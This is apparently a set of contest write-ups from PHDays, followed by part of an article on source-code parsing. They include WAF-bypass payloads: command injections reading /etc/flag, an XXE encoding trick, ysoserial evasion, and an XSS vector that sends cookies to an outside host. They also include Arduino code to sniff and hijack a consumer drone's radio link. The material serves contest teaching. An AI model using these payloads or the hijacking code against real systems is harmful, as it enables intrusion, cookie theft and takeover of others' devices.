The WAF Bypass contest usually includes a task on bypassing XXE protection. This year no one managed to bypass our checks, though a method existed: all injections via common entities, parameter entities, DOCTYPE, and so on were blocked, but if a contestant encoded the body in UTF-16 Big Endian via the command cat x.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml and removed the BOM, they would be able to bypass the check and read a flag from the file system.
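The same transformation in Python (a sketch; like iconv's explicit-endianness UTF-16BE target, Python's utf-16-be codec emits no BOM, but we strip one defensively):

```python
import codecs

def to_utf16be_no_bom(xml_text):
    """Re-encode an XML payload as UTF-16BE without a byte-order mark."""
    data = xml_text.encode('utf-16-be')
    if data.startswith(codecs.BOM_UTF16_BE):
        data = data[len(codecs.BOM_UTF16_BE):]
    return data
```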


4. f0dn3

In this task, a participant had access to a simple ToDo manager that was able to save and restore a to-do list from the file:


In HEX view a serialized Java object could be recognized (notice magic bytes 0xac 0xed at the beginning).


Deserializing user-supplied Java objects can lead to the execution of arbitrary commands on a server if vulnerable libraries are present. We deliberately included the vulnerable commons-collections 4 library in the CLASSPATH, which allowed a contestant to achieve RCE. However, on the PT Application Firewall side we banned two strings present in the exploits generated by ysoserial, a tool commonly used to exploit this vulnerability: the string “ysoserial” itself and “iTransformers”, which appears in three ysoserial exploits out of five. To solve the task, a participant needed to rename the classes and package names, delete the string ysoserial, and use one of the exploits that does not contain the string iTransformers.


5. n0ctf

The task's page offered a simple ping service with an input for an IP address. Many contestants began by inserting a quote, since user data was passed directly into a system command call. Although most command constructions were blocked, the following vectors bypassed the checks:

8.8.8.8|${IFS}cat /etc/flag
-c 1 ya.ru;/*in/cat /etc/flag
1.2.3.4|${a-cat /etc/flag}

6. c1tyf

To solve this task, contestants needed to bypass the Cross-Site Scripting check in the context of JavaScript code. The protection algorithm was described by Arseny Reutov and Denis Kolegov in the talk “Waf.js: How to protect web applications with JavaScript” held at Positive Hack Days VI. In a nutshell, the algorithm inserts user data into different contexts and tries to parse each resulting string as JavaScript code. If an AST is built and it contains restricted nodes, the request is blocked. For example, the simplest vector "+alert(1)+" is blocked, because after substitution into the double-quoted context a forbidden CallExpression node appears in the AST. However, for the competition the WithStatement node was not included in the list of forbidden nodes, which allowed bypassing the check with the following vector:

http://c1tyf.waf-bypass.phdays.com/?name=\"};with(window){onload=function(){ with(document){k=cookie;};with(window){location='http://robotsfreedom.com/phdays/?a=test'%2bk;};}}//;

Results

For the third year in a row, the winner was George Noseevich (@webpentest), who received an iPad Air 2. Second place went to Ivan Novikov (d0znpp), who got a one-year license for Burp Suite Pro. Vladas Bulavas (vladvis) came in third.

During the contest 31,412 requests were blocked.

The number of attacks of different types:


The number of attacks within the individual tasks:




Thanks to the prize winners and all the participants!

The contest was created by Arseny Reutov (Raz0r), Igor Kanygin (akamajoris), Dmitry Nagibin, Denis Kolegov, Nikolay Tkachenko, Pavel Sviridov, and the PT Application Firewall Team.

PHD VI: How They Stole Our Drone


This year, a new competition was introduced at PHDays, where anyone could try to take control over a Syma X5C quadcopter. Manufacturers often believe that if they implement a wireless standard instead of IP technology, they need not think about security, as if hackers would give up because dealing with something other than IP is too long, difficult, and expensive.

But in fact, SDR (software-defined radio) is an excellent way to access the IoT, where the initial level is determined by the level of an IoT vendor’s care and concern. However, even without SDR you can work wonders, even in the limited space of frequencies and protocols.

The contest goal was to take control over the drone.

Inputs:

  • drone control range: 2.4 GHz ISM,
  • control is driven by the module nRF24L01+ (actually, by its clone — BK2423).

Facilities (optional): Arduino Nano, nRF24L01+.

The hijacker received the Syma X8C as a prize.

Since those who wanted to steal our drone were trained people who had HackRF, BladeRF, and other serious tools in their arsenal, we describe two hijack methods: via SDR and nRF24L01+.

The Way of the Samurai: SDR

First, you need to find the channels used by the remote control. But before that, skim through the data sheet to get an idea of what to look for. To begin with, we need to understand how the frequencies are organized.


Now we know that there are 126 channels in total, spaced 1 MHz apart. It will also be useful to know the channel width and the bit rate.


Actually, a participant could manage the task without this knowledge, because you do not always know what the transmitter consists of. Now we launch a spectrum scanner. We use UmTRX with its maximum bandwidth of 13 MHz.





We do not provide sequential screenshots of each step, but it should be clear how to spot such data in the radio waves. We can see that, at certain intervals, data appear on channels 25, 41, 57, and 73.

Despite the fact that the data sheet clearly indicates modulation, in real life we do not always have a data sheet for a device. So we build a simple flowgraph in GNU Radio and add detected channels there.



According to the data sheet the bandwidth is <= 800 kHz, which means that the bit rate is 250 kbps.

Now, to look at the recorded data, we run baudline and open the added file with correct parameters, and this is what we see:


Select one of the highlighted peaks and open the waveform window.


Above we see the recorded signal. It looks like we have done everything correctly, and the phase transitions make it clear that this is FSK/GFSK modulation.

Next, we need to add a demodulator and filter out unnecessary data.


The picture looks different now; we choose the dark stripe and open the waveform window.


In fact, the task is solved: the high level is 1, the low level is 0. Using the timeline, we can determine the pulse period and calculate the bit rate.

At the very beginning, the transmitter tunes to the transmission frequency and emits a pure carrier, followed by a preamble consisting of a sequence of 0s and 1s, which may differ both in length and content between chips: in the nRF24L01+ it is one byte, 0xAA or 0x55, depending on the MSB of the address; in this case the preamble is 0xAA. Then follow the address bytes: in the nRF24L01+ the address can consist of 3 to 5 bytes (leaping ahead: this is not entirely true).
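As an illustration of this layout, here is a small Python sketch (with a hand-built, hypothetical bit string, not the real capture) that locates the 0xAA preamble and reads the 5 address bytes that follow it:

```python
def bits_of(data: bytes) -> str:
    """Render bytes as a string of 0s and 1s, MSB first."""
    return ''.join(f'{b:08b}' for b in data)

# Hypothetical capture: some noise, the 0xAA preamble, then the address bytes.
capture = '0011' + bits_of(bytes([0xAA, 0xA2, 0x00, 0x09, 0x89, 0x0F])) + '0111'

start = capture.index('10101010') + 8        # first preamble match, then skip it
address = int(capture[start:start + 40], 2)  # 5 address bytes = 40 bits
print(hex(address))  # 0xa20009890f
```

A real tool must also cope with bit errors and false preamble matches, which is why a CRC check over the candidate packet is needed (see below).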


Now we know the address (0xa20009890f). For further analysis, we need to do some automation, like this, for example:



The output is a file consisting of a sequence of 0s and 1s:

$ hexdump -C test3.raw

One of our packets can be spotted at offset 0x5e25:


Everyone decides for themselves how to use this, but it is necessary to find out the length of the packet and the type of CRC used. We created a utility that analyzes a file, tries to find a preamble, and then attempts to calculate the CRC for different payload lengths and addresses via two different methods (see the data sheet). We did it this way:


But later we realized that Python is only suitable for offline analysis: it is very difficult for it to “digest” data in real time even at a bit rate of 250 kbps, not to mention higher speeds. This is why a second version, written in C and operating in real time, was developed.
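For offline analysis, the brute-force idea can be sketched in Python. This is a simplified illustration, not the contest utility; it assumes CRC-16/CCITT-FALSE (one of the variants described in the data sheet) computed over address plus payload, and the frame below is synthetic:

```python
def crc16_ccitt(data: bytes, crc: int = 0xFFFF) -> int:
    """CRC-16/CCITT-FALSE: poly 0x1021, init 0xFFFF, no reflection."""
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc

def find_payload_len(frame: bytes, addr_len: int = 5):
    """Try every payload length until the computed CRC matches the trailing bytes."""
    for plen in range(1, 33):
        end = addr_len + plen
        if len(frame) < end + 2:
            break
        if crc16_ccitt(frame[:end]) == int.from_bytes(frame[end:end + 2], 'big'):
            return plen
    return None

# Synthetic frame: 5-byte address + 10-byte payload + CRC over both.
body = bytes.fromhex('a20009890f') + bytes(range(10))
frame = body + crc16_ccitt(body).to_bytes(2, 'big')
```

For a frame built this way, `find_payload_len(frame)` recovers the payload length; on real captures a length that verifies across many packets is the right one.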


So we have the payload; now we only need to examine the Syma protocol.

Another Way: Arduino and nRF24L01+


This method, in contrast to the one above, requires almost no knowledge in the field of radio and is extremely cheap (an Arduino is $2, an nRF24L01+ is $1, and roughly the same again for a mini-USB cable and DuPont wires), but it requires some ingenuity. This is the method we wanted the participants to reproduce.

The main problem is that the nRF24L01+ does not have a promiscuous mode. However, the module has some strange features; for example, the data sheet contains an interesting detail:



If you write 00 to this register, the address will be 2 bytes long. Normally a preamble is transmitted so that the receiver can synchronize with the transmitter, which is why a sequence of alternating zeros and ones is usually sent as the preamble. Here is the second feature of the nRF24L01+ module: it does not look for a preamble and does not use it at all; it looks only for the value recorded as the receive address. If we look at the transmitted signal in the screenshots above, we will notice that before the preamble the transmitter emits a pure carrier. Experiments showed that the nRF24L01+ often interprets it as 0x00 (sometimes as 0xFF, and rarely as a random byte). Thus, using these undocumented features, we can put the nRF24L01+ into promiscuous mode by setting the address length to 2 bytes and the address to 0x00AA or 0x0055. In some cases we will receive data shifted by 1 bit. Moreover, we can receive data without checking the CRC.
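The 1-bit shift mentioned above is easy to undo offline; a small sketch:

```python
def shift_left(buf: bytes, bits: int = 1) -> bytes:
    """Re-align a captured buffer by shifting it left by the given bit count."""
    width = 8 * len(buf)
    val = (int.from_bytes(buf, 'big') << bits) & ((1 << width) - 1)
    return val.to_bytes(len(buf), 'big')

# 0x55 0x00 shifted left by one bit becomes 0xAA 0x00
assert shift_left(bytes([0x55, 0x00])) == bytes([0xAA, 0x00])
```

In practice you try both the raw buffer and the shifted one, and keep whichever yields a valid CRC.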

Now we have all the necessary information and can use the RF24 library (github.com/TMRh20/RF24), though it has a flaw: in the file RF24.cpp, in the function

void RF24::setAddressWidth(uint8_t a_width){
if(a_width -= 2){
write_register(SETUP_AW,a_width%4);
addr_width = (a_width%4) + 2;
}
}

the validity check should be removed:

void RF24::setAddressWidth(uint8_t a_width){
a_width -= 2;
write_register(SETUP_AW,a_width%4);
addr_width = (a_width%4) + 2;
}

Now we write a small sketch for Arduino (this example is for Mega, but it works for any other model, you just need to change CE_PIN, CSN_PIN on your own):

#include <SPI.h>
#include <nRF24L01.h>
#include <RF24.h>
#include <printf.h>

#define CE_PIN  53 /// Change it for your board
#define CSN_PIN 48 /// Change it for your board

RF24 radio(CE_PIN, CSN_PIN); 

const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
uint64_t pipe = 0x00AA;

byte buff[32];
byte chan=0;
byte len = 32;
byte addr_len = 2;

void set_nrf(){
  radio.setDataRate(RF24_250KBPS);
  radio.setCRCLength(RF24_CRC_DISABLED);
  radio.setAddressWidth(addr_len);
  radio.setPayloadSize(len);
  radio.setChannel(chan);
  radio.openReadingPipe(1, pipe);
  radio.startListening();  
}

void setup() {
  Serial.begin(2000000);
  printf_begin();
  radio.begin();
  set_nrf();
}

long t1 = 0;
long t2 = 0;
long tr = 0;

void loop() {
  byte in;
   if (Serial.available() >0) {
     in = Serial.read();
     if (in == 'w') {
      chan+=1;
      radio.setChannel(chan);
      Serial.print("\nSet chan: "); 
      Serial.print(chan);
     }
     if (in == 's') {
      chan-=1;
      radio.setChannel(chan);
      Serial.print("\nSet chan: "); 
      Serial.print(chan);
     }
     if (in == 'q') {
     Serial.print("\n"); 
     radio.printDetails();
     }  
   }
  while (radio.available()) {                      
    t2 = t1;
    t1 = micros();
    tr+=1;
    radio.read(&buff, sizeof(buff) );
    Serial.print("\n"); 
    Serial.print(tr);
    Serial.print("\tms: "); 
    Serial.print(millis());
    Serial.print("\tCh: ");
    Serial.print(chan);
    Serial.print("\tGet data: ");
    for (byte i=0; i<len; i++){
      Serial.print(tohex[(byte)buff[i]>>4]);
      Serial.print(tohex[(byte)buff[i]&0x0f]);      
    }    
  }
}

Now you can gather data from the channel on the serial port and change the channel by sending “w” or “s” to the port. Further handling can be performed in any convenient manner. Note that the port speed is non-standard (2 Mbps) to let the Arduino spend less time on I/O (do not forget that it runs at only 16 MHz).


After finding the channel and capturing the address, you should set the captured address as the receive address to filter the data:

uint64_t pipe = 0xa20009890fLL;
byte addr_len = 5;


Then we run through all the channels and find where the given address appears. Now we notice that bytes 10, 11, and 12 vary depending on the data, and they are followed by a sequence of random bytes (noise). We try to enable CRC16 (the last two bytes) and change the packet length to 10 bytes:

byte len = 10;
radio.setCRCLength(RF24_CRC_16);


Yes! We have found all the necessary nRF24L01+ settings used by the remote control, and it is time to analyze the Syma protocol itself.

The Syma Protocol

It is not difficult to analyze it by recording some activity from the panel.

  • The first byte is the throttle value (throttle stick).
  • The second byte is the elevator value (pitch: tilting back and forth), where the high bit is the direction (forward or backward) and the remaining 7 bits are the value.
  • The third byte is the rudder value (yaw: pivoting left and right), where the high bit is the direction (left or right) and the remaining 7 bits are the value.
  • The fourth byte is the aileron value (roll: leaning to the left and to the right), where the high bit is the direction and the remaining 7 bits are the value.
  • The tenth byte is the checksum, calculated as the XOR of the first 9 bytes plus 0x55; figuring this out is perhaps the most difficult part.

The remaining bytes could be left as those that were intercepted: they contain zero position adjustment values (trims), and a few flags for manipulating the camera.

Now we just need to craft a valid packet, for example to force the drone to spin on its axis counterclockwise: 92007f000040002400de
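The checksum of that packet is easy to verify in a few lines of Python (packet bytes taken from the example above):

```python
packet = bytes.fromhex('92007f000040002400de')

# XOR of the first 9 bytes, plus 0x55, truncated to one byte
crc = 0
for b in packet[:9]:
    crc ^= b
crc = (crc + 0x55) & 0xFF

assert crc == packet[9]  # 0xde
```

The same calculation is what the `checksum()` function in the sketch below performs on the Arduino side.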

Below is a sketch of our interceptor from PHDays:


#include <SPI.h>
#include <nRF24L01.h>
#include <RF24.h>
#include <printf.h>

#define CE_PIN  48
#define CSN_PIN 53

//// syma
uint8_t chan[4] = {25,41,57,73}; 
const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
uint64_t pipe = 0xa20009890fLL; 

RF24 radio(CE_PIN, CSN_PIN); 
int8_t packet[10];
int joy_raw[7];
byte ch=0;

//// controls
uint8_t throttle = 0;
int8_t rudder = 0;
int8_t elevator = 0;
int8_t aileron = 0;

//// syma checksum
uint8_t checksum(){
    uint8_t sum = packet[0];
    for (int i=1; i < 9; i++) sum ^= packet[i];
    return (sum + 0x55);
}

//// initial
void setup() {
  //set nrf
  radio.begin();
  radio.setDataRate(RF24_250KBPS);
  radio.setCRCLength(RF24_CRC_16);
  radio.setPALevel(RF24_PA_MAX);
  radio.setAutoAck(false);
  radio.setRetries(0,0);
  radio.setAddressWidth(5);
  radio.openWritingPipe(pipe);
  radio.setPayloadSize(10);
  radio.setChannel(25);
  //set joystick
  pinMode(A0, INPUT);
  pinMode(A1, INPUT);
  pinMode(A2, INPUT);
  pinMode(A3, INPUT);
  pinMode(A4, INPUT);
  pinMode(A5, INPUT);
  pinMode(A6, INPUT);
  digitalWrite(A3, HIGH);
  digitalWrite(A4, HIGH);
  digitalWrite(A5, HIGH);
  digitalWrite(A6, HIGH);
  //init default data
  packet[0] = 0x00;
  packet[1] = 0x00;
  packet[2] = 0x00;
  packet[3] = 0x00;
  packet[4] = 0x00;
  packet[5] = 0x40;
  packet[6] = 0x00;
  packet[7] = 0x21;
  packet[8] = 0x00;
  packet[9] = checksum();
}

void read_logitech() {
  joy_raw[0] = analogRead(A0);
  joy_raw[1] = analogRead(A1);
  joy_raw[2] = analogRead(A2);
  joy_raw[3] = !digitalRead(A3);
  joy_raw[4] = !digitalRead(A4);
  joy_raw[5] = !digitalRead(A6);
  joy_raw[6] = !digitalRead(A5);
  //little calibration
  joy_raw[0] = map(joy_raw[0],150, 840, 255, 0)+10;
  joy_raw[0] = constrain(joy_raw[0], 0, 254);
  joy_raw[1] = map(joy_raw[1],140, 830, 0, 255);
  joy_raw[1] = constrain(joy_raw[1], 0, 254);
  joy_raw[2] = map(joy_raw[2],130, 720, 255, 0);
  joy_raw[2] = constrain(joy_raw[2], 0, 254);
}

//// main loop
void loop() {
  read_logitech();
  throttle = joy_raw[2];
  rudder = 64*joy_raw[4] - 64*joy_raw[5];
  elevator = joy_raw[1]-127;
  aileron = joy_raw[0]-127;
  radio.openWritingPipe(pipe);
  ch +=1;
  if (ch>3) ch = 0; 
  radio.setChannel(chan[ch]);      
  packet[0] = throttle;
  if (elevator < 0) packet[1] = abs(elevator) | 0x80; else packet[1] = elevator;
  if (rudder < 0) packet[2] = abs(rudder) | 0x80; else packet[2] = rudder;
  if (aileron < 0) packet[3] = abs(aileron) | 0x80; else packet[3] = aileron;
  packet[4] = 0x00;
  packet[5] = 0x40;
  packet[6] = 0x00;
  packet[7] = 0x21;
  packet[8] = 0x00;
  packet[9] = checksum();
  radio.write( packet, sizeof(packet) );
}

If you do not want to deal with the Arduino, you can create an interceptor on a Raspberry Pi.


You can find ready-made files here: github.com/chopengauer/nrf_analyze.

Participants and winners

During the two days, 15 attendees took part in the contest. More people were interested, but most of them decided not to participate when they found out that it was not about hacking Wi-Fi. Many people are afraid to take on something new and unfamiliar, and this keeps the Internet of Things secure.

Participants included those who have built their wireless networks on nRF24L01+, and those who heard about them for the first time.

During the first day, one of the participants attempted to take control over the drone by recording a signal from the panel and subsequently replaying it using SDR (a replay attack). But the drone just slightly twitched. This attack is useless here because the drone uses 4 channels spread over 48 MHz between the lowest and the highest, and affecting a single channel is insufficient.

By the evening of the first day another participant had all the necessary knowledge about the features of the module (the two-byte address 0x00AA) and tried to sniff the address from our panel, but the problem was that he used the data sheet of the nRF24L01 chip (the older version, without the +), which does not support the 250 kbps bit rate. Moreover, he refused to use ready-made libraries for the module and worked directly with its registers.

The winner of the contest was Gleb Cherbov, who managed to take full control of the drone by 4 p.m. on the second day. The other participants were unable to intercept the device’s address.

Contest Authors: Pavel Novikov and Artur Garipov, Positive Technologies

Theory and Practice of Source Code Parsing with ANTLR and Roslyn

PT Application Inspector provides several approaches to analysis of the source code written in different programming languages:
  • Search by signatures.
  • Exploring the properties of mathematical models derived from the static abstract interpretation of code.
  • Dynamic analysis of the deployed application and verification of the static analysis results.
This series of articles focuses on the structure and operation principles of the signature analysis module (PM, pattern matching). The key benefits of such an analyzer include high performance, simplicity of pattern description, and scalability across various languages. The disadvantage of this approach is that the module is not able to analyze complex vulnerabilities, which require developing high-level models of code execution.

The following requirements have been defined for the module under development:
  • Capability of working with multiple programming languages and the option to add new ones easily.
  • Functionality that allows analysis of the code containing syntactic and semantic errors.
  • Capability of describing patterns using a domain-specific language (DSL).
In this case, all the patterns describe flaws or vulnerabilities in the source code.
The process of code analysis could be divided into the following stages:
  1. Parsing into a language dependent representation (abstract syntax tree, AST).
  2. Converting AST to a language independent unified format (UAST).
  3. A direct comparison with the patterns described in the DSL.
This article focuses on the first stage that includes parsing, comparing functionalities and features of various parsers, as well as applying theoretical principles to practice using Java, PHP, PLSQL, TSQL and even C# grammars. Other stages will be discussed in future publications.

Theory of parsing

At the outset, the following question may arise: why build a unified AST and develop algorithms for graph comparison instead of using regular expressions? The point is that not all patterns can be described with regular expressions, although it should be noted that regular expressions in .NET come close to context-free grammars in expressive power thanks to named groups and backreferences. There is also an article from the PVS-Studio developers covering this subject. Moreover, the coherence of a unified AST allows building more complex representations of code execution on top of it, such as a code property graph.

Terminology


Those already familiar with the theory of parsing may skip this section.
Parsing is a process of creating a structured representation of the source code. Typically, parsing is broken into two parts, lexing and parsing. The lexer groups the source code characters into notional sequences called lexemes. It will then identify the type of the lexeme (an identifier, a number, a string, etc.). The set of values of the lexeme and its type is called a token. If you have a look at the figure below, sp, =, 100 is the token. The parser converts a stream of tokens into the tree structure, which is called a parse tree. In this case, assign is one of the nodes of the tree. The abstract syntax tree (AST) is a high-level parse tree with "unimportant" tokens such as brackets or commas removed. However, some parsers combine parsing and lexing.


Lexer & Parser

Some rules define the AST nodes; together these rules are called the grammar of the language. Tools that generate lexer and parser code for a particular platform (runtime) from a grammar are called parser generators, for example ANTLR, Bison, or Coco/R. However, parsers are often written manually; Roslyn is an example of such a tool. The advantages of the manual approach are that such parsers tend to be more efficient and readable.

Since we decided to develop this project on .NET, we chose Roslyn for analysis of C# code and ANTLR for the other languages, as ANTLR supports the .NET runtime and has more features than the alternatives.

Types of formal languages


There are 4 types of formal languages according to the Chomsky hierarchy:
  • Regular grammars: a^n
  • Context-free grammars: a^n b^n
  • Context-sensitive grammars: a^n b^n c^n
  • Turing complete.
Regular expressions describe only elementary matching constructs, which nevertheless cover the majority of everyday tasks. Another advantage of regular expressions is that most programming languages support them. Complexity in both writing and parsing makes Turing-complete languages unsuitable for practical use (for example, the esoteric programming language Thue comes to mind).

In fact, almost all the syntax of modern programming languages can be defined by context-free grammars. Comparing context-free grammars and regular expressions in lay terms, the latter have no memory (they cannot count). And comparing context-sensitive and context-free grammars, the latter do not remember the rules that have already been applied.
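The "no memory" point can be demonstrated in a couple of lines: a regular expression happily accepts unbalanced input that the context-free language a^n b^n rejects.

```python
import re

# a*b* describes a regular superset of a^n b^n: it cannot enforce equal counts.
assert re.fullmatch(r'a*b*', 'aaabb') is not None

def in_anbn(s: str) -> bool:
    # Recognizing a^n b^n needs "memory": count the a's, demand as many b's.
    n = s.count('a')
    return s == 'a' * n + 'b' * n

assert in_anbn('aaabbb')
assert not in_anbn('aaabb')
```

(.NET regexes with balancing groups can in fact match such languages, which is the caveat mentioned earlier, but the classical regular-expression formalism cannot.)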

Moreover, a language may be context-free in one case and context-sensitive in another. If semantics are taken into account (i.e., consistency with the definitions used in the language, and type consistency in particular), the language can be considered context-sensitive. For example, in T a = new T(), the type in the constructor on the right must be the same as the one on the left. Semantics are usually checked after parsing. Still, there are syntactic constructions that cannot be parsed using context-free grammars, for example, heredoc in PHP: $x = <<<EOL Hello world EOL; here EOL is an arbitrary marker signifying the end of the literal, so parsing it requires memorizing the value of the opening token. This article focuses on the analysis of such context-free and context-sensitive languages.
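A sketch of why heredoc forces the lexer to keep state: the terminator is whatever identifier opened the literal, so the lexer must remember it (simplified; real PHP allows any marker name and richer syntax):

```python
def lex_heredoc(src: str) -> str:
    # Remember the marker that opens the heredoc...
    marker = src[src.index('<<<') + 3 : src.index('\n')]
    body_start = src.index('\n') + 1
    # ...and use that remembered value to find the terminator line.
    end = src.index('\n' + marker, body_start)
    return src[body_start:end]

assert lex_heredoc('$x = <<<EOL\nHello world\nEOL;') == 'Hello world'
```

No fixed, finite set of context-free rules can encode "match the same identifier later" for arbitrary identifiers, which is exactly the memory a hand-written lexer (or an ANTLR action) supplies.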

ANTLR

This parser generator is LL(*); it has existed for over 20 years, and the 4th version was released in 2013. It is now developed on GitHub. ANTLR generates parsers in Java, C#, Python2, Python3, and JavaScript; C++, Swift, and Go are coming soon (hopefully). It is quite easy to develop and debug grammars with this tool. Although LL grammars do not allow left-recursive rules, since version 4 ANTLR lets you write such rules (except for rules with hidden or indirect left recursion); they are translated into ordinary rules during parser generation. This shortens the grammar when writing expressions, for example arithmetic ones:

expr
: expr '*' expr
| expr '+' expr
| expr '^' expr
| id
;
In addition, parsing performance is significantly improved by the Adaptive LL(*) algorithm. This algorithm combines the advantages of the relatively slow GLL and GLR algorithms, which can resolve ambiguous cases (and are used for parsing natural languages), with fast LL recursive-descent algorithms, which in turn cannot resolve all ambiguity problems. The idea is to run LL parsers pseudo-parallel on each rule, caching and choosing the right prediction (as opposed to GLR, where several alternatives are allowed); the algorithm is thus dynamic. Although the theoretical worst-case parsing complexity of this algorithm is O(n^4), the parsing rate for existing programming languages appears to be linear in practice. The 4th version also has an improved error recovery algorithm. Read more about the ANTLR 4 algorithms and the differences from other parsing algorithms in the article Adaptive LL(*) Parsing: The Power of Dynamic Analysis.

Roslyn


Roslyn is not just a parser; it is a fully featured tool for parsing, analyzing, and compiling C# code. It is also developed on GitHub, and it is more advanced than ANTLR. This article deals only with its parsing features, regardless of semantics. Roslyn parses code into a full-fidelity, immutable, and thread-safe tree. Full fidelity means that such a tree can be converted back into character-for-character identical code, including spaces, comments, and preprocessor directives, even if there are syntax errors. Immutability makes multi-threaded tree processing easy, as a "smart" copy of the tree (storing only the changes) is created in each separate thread. The tree may consist of:
  • Syntax Node — a non-terminal node of the tree containing a few other nodes and displaying a certain structure. It may also contain an optional node (e.g., ElseClauseSyntax for if).
  • Syntax Token — a terminal node that represents a keyword, an identifier, a literal, or a punctuation mark.
  • Syntax Trivia — a terminal node that represents a space, a comment or a preprocessor directive (it can be easily removed without losing code information). Trivia does not have a parent. These nodes are critical when converting a tree back to code (e.g., during refactoring).

Parsing problems

The development of grammars and parsers introduces some challenges that should be considered.

Using keywords as identifiers


It often happens that some keywords may also appear as identifiers during parsing. For example, in C# the async keyword placed before a method signature indicates that the method is asynchronous. But if this word is used as a variable identifier, as in var async = 42;, the code is also valid. In ANTLR, this problem can be solved in two ways:
  1. Using a semantic predicate in the syntactic rule: async: {_input.LT(1).GetText() == "async"}? ID; in this case the async token itself does not exist. This approach is bad because the grammar becomes runtime-dependent and looks ugly.
  2. Inserting the token into the id rule:
    ASYNC: 'async';
    ...
    id
    : ID
    ...
    | ASYNC;

Ambiguity


Natural language contains ambiguous expressions (like, "Flying planes can be dangerous"). Such constructions may also occur in a formal language. For example:

stat: expr ';' // expression statement
| ID '(' ')' ';' // function call statement;
;
expr: ID '(' ')'
| INT
;

However, contrary to natural languages, such constructions are likely to be the result of an improperly designed grammar. ANTLR cannot detect this kind of ambiguity while generating a parser, but if the LL_EXACT_AMBIG_DETECTION mode is set (since ALL is a dynamic algorithm), ambiguity can be detected during parsing. Ambiguity may arise in both the lexer and the parser. For two rules matching the same lexeme, the lexer generates a token of the rule defined first (see the example with identifiers). In languages where ambiguity is acceptable (for example, C++), you can use semantic predicates (code insertions) to resolve it, for example:
expr: { isfunc(ID) }? ID '(' expr ')' // func call with 1 arg
| { istype(ID) }? ID '(' expr ')' // ctor-style type cast of expr
| INT
| void
;
Sometimes the ambiguity can be fixed with a little grammar redesign. For example, C# has the right-shift operator RIGHT_SHIFT: '>>', but two angle brackets can also close a nested generic type: List<List<int>>. If we define >> as a token, the nested list construction would never be parsed, because the parser assumes there is a >> operator instead of two closing brackets. To resolve this, the RIGHT_SHIFT token simply has to be dropped. At the same time we can keep the LEFT_SHIFT: '<<' token as-is, because such a character sequence never occurs while parsing valid code.
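A quick way to see the problem is to compare tokenizations with and without a >> token, using a toy regex lexer (not ANTLR):

```python
import re

SRC = 'List<List<int>>'

# With a RIGHT_SHIFT token, maximal munch eats both closing brackets at once.
with_shift = re.findall(r'>>|[<>]|\w+', SRC)
assert '>>' in with_shift

# Without it, the two '>' tokens survive and the parser can close both lists.
without_shift = re.findall(r'[<>]|\w+', SRC)
assert without_shift.count('>') == 2
```

The parser can still recognize a right shift by matching two adjacent '>' tokens, which is essentially what dropping the lexer token amounts to.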

However, we have not yet performed a detailed analysis of whether any ambiguity remains in the grammars developed for our module.

Handling whitespaces, comments


Another parsing problem is handling comments. The disadvantage of including comments in the grammar is that the grammar becomes overcomplicated: in effect, every node would have to account for comments. However, we cannot simply discard comments, because they may contain relevant information. ANTLR handles comments with so-called channels, which separate the comment tokens from the rest: Comment: ~[\r\n?]+ -> channel(PhpComments);

In Roslyn, comments are included in the tree nodes, but they belong to a special type called Syntax Trivia. In both ANTLR and Roslyn you can get the list of trivia tokens associated with a particular ordinary token. ANTLR has methods that, for the token with index i in the stream, return all tokens on a specified channel to the right or to the left: getHiddenTokensToRight(int tokenIndex, int channel), getHiddenTokensToLeft(int tokenIndex, int channel). Roslyn attaches such tokens to the terminal Syntax Token.

To retrieve all the comments in ANTLR, you can take all tokens on a specified channel: lexer.GetAllTokens().Where(t => t.Channel == PhpComments). In Roslyn you can get all DescendantTrivia of the root node with the following SyntaxKind values: SingleLineCommentTrivia, MultiLineCommentTrivia, SingleLineDocumentationCommentTrivia, MultiLineDocumentationCommentTrivia, DocumentationCommentExteriorTrivia, XmlComment.

Handling whitespace and comments is one of the reasons why, for example, LLVM bitcode cannot be used for this kind of analysis: they are simply discarded. Besides comments, even whitespace handling is very important, for example for detecting indentation errors in a single-statement if (this example was taken from the article PVS-Studio delved into the FreeBSD kernel):

case MOD_UNLOAD:
if (via_feature_rng & VIA_HAS_RNG)
random_nehemiah_deinit();
random_source_deregister(&random_nehemiah);

Handling parse errors



An important capability of each parser is error handling. The reasons are as follows:
  • The parsing process should not be interrupted by a single mistake; the parser must recover properly and continue parsing the code (for instance, after a missing semicolon).
  • The parser should report the relevant error and its location, instead of producing multiple irrelevant errors.

ANTLR errors

The following parsing errors are present in ANTLR:
  • Token recognition error (Lexer no viable alt). This is the only lexical error; it indicates that no rule can create a token from an existing lexeme:

    class # { int i; } — # is the above mentioned lexeme.
  • Missing token. In this case, ANTLR inserts the missing token to a stream of tokens, marks it as missing, and continues parsing as if this token exists.

    class T { int f(x) { a = 3 4 5; } } — } is the above mentioned token.
  • Extraneous token. ANTLR marks a token as incorrect and continues parsing as if this token did not exist. An example of such a token is the first ; below:

    class T ; { int i; }
  • Mismatched input. In this case "panic mode" is initiated, a set of input tokens is ignored, and the parser waits for a token from the synchronizing set. In the following example the 4th and 5th tokens are ignored and ; is the synchronizing token:

    class T { int f(x) { a = 3 4 5; } }
  • No viable alternative input. This error describes all other possible parsing errors.

    class T { int ; }
Furthermore, errors can be handled manually by adding an error alternative to the rule:
function_call
: ID '(' expr ')'
| ID '(' expr ')' ')' {notifyErrorListeners("Too many parentheses");}
| ID '(' expr {notifyErrorListeners("Missing closing ')'");}
;
Moreover, ANTLR 4 allows you to use your own error handling mechanism. This option may be used to increase parser performance: first, the code is parsed using the fast SLL algorithm, which, however, may parse ambiguous code improperly. If this algorithm reveals at least one error (which may be a genuine error in the code or an ambiguity), the code is re-parsed using the complete but slower ALL algorithm. Of course, a file with an actual error (e.g., a missing semicolon) is always parsed with LL, but the number of such files is small compared to error-free ones.
Maximizing performance when parsing in ANTLR:
// try with simpler/faster SLL(*)
parser.getInterpreter().setPredictionMode(PredictionMode.SLL);
// we don't want error messages or recovery during first try
parser.removeErrorListeners();
parser.setErrorHandler(new BailErrorStrategy());
try {
    parser.startRule();
    // if we get here, there was no syntax error and SLL(*) was enough;
    // there is no need to try full LL(*)
}
catch (ParseCancellationException ex) { // thrown by BailErrorStrategy
    tokens.reset(); // rewind input stream
    parser.reset();
    // back to standard listeners/handlers
